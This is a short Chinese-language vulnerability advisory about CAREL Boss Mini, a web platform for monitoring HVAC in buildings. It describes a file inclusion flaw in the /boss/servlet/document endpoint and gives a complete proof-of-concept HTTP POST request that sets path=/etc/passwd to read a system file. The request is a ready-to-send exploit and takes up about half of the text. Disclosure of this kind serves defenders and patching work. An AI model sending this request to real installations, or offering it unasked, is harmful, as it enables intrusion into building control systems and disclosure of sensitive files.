CAREL Boss Mini是意大利CAREL公司推出的基于Web的楼宇管理和监控平台，广泛应用于HVAC（供暖、通风和空调）系统的远程监控与管理。该平台提供实时数据采集、设备控制、报警管理、能耗分析等核心功能，是工业物联网和智能建筑管理领域的重要解决方案。CAREL Boss Mini的/boss/servlet/document接口存在文件包含漏洞，攻击者可以通过操纵path参数包含任意文件，可能导致敏感信息泄露或远程代码执行。 POST /boss/servlet/document HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Connection: close Content-Length: 16 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip path=/etc/passwd

CAREL

POC: 已公开